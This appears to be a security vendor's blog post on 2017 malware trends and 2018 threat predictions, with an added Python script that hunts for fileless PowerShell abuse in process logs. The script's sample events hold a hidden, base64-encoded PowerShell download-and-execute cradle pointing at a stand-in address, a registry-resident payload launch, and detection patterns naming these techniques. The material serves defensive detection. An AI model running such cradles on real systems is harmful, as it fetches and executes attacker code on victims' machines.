Looking back at the past 12 months, LMNTRIX Labs has analyzed a host of different malware samples and remediated our clients’ environments against them. While we saw everything from key-loggers to banking trojans and crypto-miners, one form of malware reigned supreme.
Yup, you guessed it… ransomware.
This year alone, we picked apart more than 30 ransomware samples, including the juggernaut WannaCry and NotPetya variants that made the world stop and take notice. With this in mind, it’s clear 2017 was the year of ransomware.
Although it was hard to go a month without running into a new ransomware sample, we also saw a clear rise in the number of crypto-mining malware strains, and – as the value of digital currencies continues to sky-rocket – this is an attack-type that will only become more prevalent.
Taking these trends into account, what’s on the horizon for 2018?
• Supply chains will come under heavy fire from attackers compromising trusted software and the build and update infrastructure behind it. As the ‘big end of town’ continues to bolster its defences, attackers will look further down the supply chain for other avenues into the enterprise.
• Crypto-mining malware will become a favourite attack-type, particularly given Bitcoin’s meteoric rise in value. As long as the surge continues, threat actors will leave no stone unturned in exploiting it.
• Ransomware isn’t going anywhere, particularly given its success this year. New variants will emerge, old ones will be tweaked, and the deep and dark webs will be flooded with ransomware-as-a-service offerings for would-be hackers. This year’s high-profile attacks will draw more people into the shady underbelly of the internet, and with malware-as-a-service offerings complete with full customer support already available, we expect these to become both more commonplace and more sophisticated next year.
• Fileless malware and PowerShell abuse will come to the fore as attackers seek to maintain persistence within victim environments. These tactics will be complemented by DLL injection, code obfuscation and vulnerability exploitation as ways to evade defences, while manipulating Windows Registry keys to proxy command-and-control communications will gain popularity.
• Industry-specific malware will become much more common, particularly in the wake of this year’s “Industroyer” strain, which was crafted specifically with Industrial Control Systems in mind. We’ll see the financial industry in the crosshairs, with trojans targeting point-of-sale terminals; connected healthcare devices will remain easy targets due to a lack of appropriate security measures; and, as self-driving cars draw closer to reality, Bluetooth- and Wi-Fi-based attacks will make connected vehicles easy targets for module hijacking.
With everything we’ve seen this year, it’s clear that traditional, signature-based perimeter defences are no longer a viable answer to advanced threats. Today’s malware is designed to slip past the walls enterprises erect around their environments, so only active defence with proactive hunting and continuous monitoring can discover and destroy the threats that yesterday’s defences miss. Deep and dark web monitoring lets you know when your customer data turns up on the black market (or when someone is asking for advice on how to get past your defences), while decoys and a deceptive parallel environment can lie in wait to trap attackers the second they breach your systems.
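To make the “proactive hunting” above concrete for the fileless PowerShell tradecraft predicted in the list, here is an added example of a hunt over process-creation telemetry. It is illustrative code written for this page, not LMNTRIX tooling, and the sample events are constructed (Sysmon Event ID 1 / Windows 4688-style fields; 203.0.113.10 is a documentation address, and the registry key name is made up). It decodes `-EncodedCommand` payloads so the base64 wrapper cannot hide a download cradle, and it flags the patterns that go with fileless persistence: hidden windows, execution-policy bypass, an Office or script-host parent, and a script body pulled out of the registry with `Get-ItemProperty` and fed to `IEX`.

```python
import base64
import re
from pathlib import PureWindowsPath

# --- constructed sample telemetry (not real logs) ---------------------------
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# A download cradle as an attacker would pass it; 203.0.113.10 is a documentation address.
CRADLE = 'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.10/a.ps1")'
# -EncodedCommand takes base64 of the UTF-16LE script text, so build it the same way.
ENCODED_CRADLE = base64.b64encode(CRADLE.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Users"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE", "Image": PS_EXE,
     "CommandLine": f"powershell.exe -w hidden -nop -ep bypass -enc {ENCODED_CRADLE}"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "Image": PS_EXE,   # registry-resident payload
     "CommandLine": 'powershell.exe -NoP -W Hidden -c "iex (Get-ItemProperty HKCU:\\Software\\Classes\\xyz).payload"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe C:\\notes.txt"},
]

# Launch flags that legitimate admin scripts rarely combine.
FLAG_RULES = [
    (re.compile(r"(?i)(?:^|\s)-(w|win|windowstyle)\s+hidden\b"), "hidden window"),
    (re.compile(r"(?i)(?:^|\s)-(nop|noprofile)\b"), "profile suppressed"),
    (re.compile(r"(?i)(?:^|\s)-(ep|ex|exec|executionpolicy)\s+bypass\b"), "execution policy bypass"),
]
# Content checks run over the visible command line AND the decoded payload.
CONTENT_RULES = [
    (re.compile(r"(?i)\b(iex|invoke-expression)\b"), "invoke-expression"),
    (re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|net\.webclient|bitstransfer)"), "download cradle"),
    (re.compile(r"(?i)get-itemproperty\s+['\"]?hk(cu|lm|ey_)"), "script body read from registry"),
    (re.compile(r"(?i)frombase64string"), "inline base64 decode"),
]
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe"}


def extract_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, None if absent, or a marker if undecodable.

    powershell.exe accepts -e, -ec and any unambiguous prefix of -EncodedCommand,
    so match on prefix rather than on one literal spelling of the switch.
    """
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith(("-", "/")):
            continue
        name = tok.lstrip("-/").lower()
        if name and (name == "ec" or "encodedcommand".startswith(name)):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
                return "<undecodable payload>"
    return None


def analyze_event(event):
    """Return the reasons a process-creation event looks like fileless PowerShell abuse."""
    image = PureWindowsPath(event["Image"]).name.lower()
    if image not in ("powershell.exe", "pwsh.exe", "powershell_ise.exe"):
        return []
    cmd = event["CommandLine"]
    reasons = []
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
    for pattern, label in FLAG_RULES:
        if pattern.search(cmd):
            reasons.append(label)
    decoded = extract_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
    body = cmd if decoded is None else cmd + "\n" + decoded
    for pattern, label in CONTENT_RULES:
        if pattern.search(body):
            reasons.append(label)
    return reasons


def hunt(events, threshold=2):
    """Flag events with at least `threshold` indicators; a lone -NoProfile is not enough."""
    hits = []
    for idx, ev in enumerate(events):
        reasons = analyze_event(ev)
        if len(reasons) >= threshold:
            hits.append({"index": idx, "reasons": reasons,
                         "decoded": extract_encoded_command(ev["CommandLine"])})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"event {hit['index']}: {', '.join(hit['reasons'])}")
        if hit["decoded"]:
            print("   decoded:", hit["decoded"])
```

Run against the constructed events, the plain `Get-ChildItem` invocation and the notepad launch pass, while the Word-spawned encoded cradle and the wscript-spawned registry-resident script are both flagged with their full reason lists. The threshold keeps a single benign switch from paging an analyst; in production the same rules would be fed from the SIEM rather than an inline list.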
The threat landscape is ever-changing, so if you rely too heavily on yesterday’s defences you’ll find yourself in tomorrow’s headlines.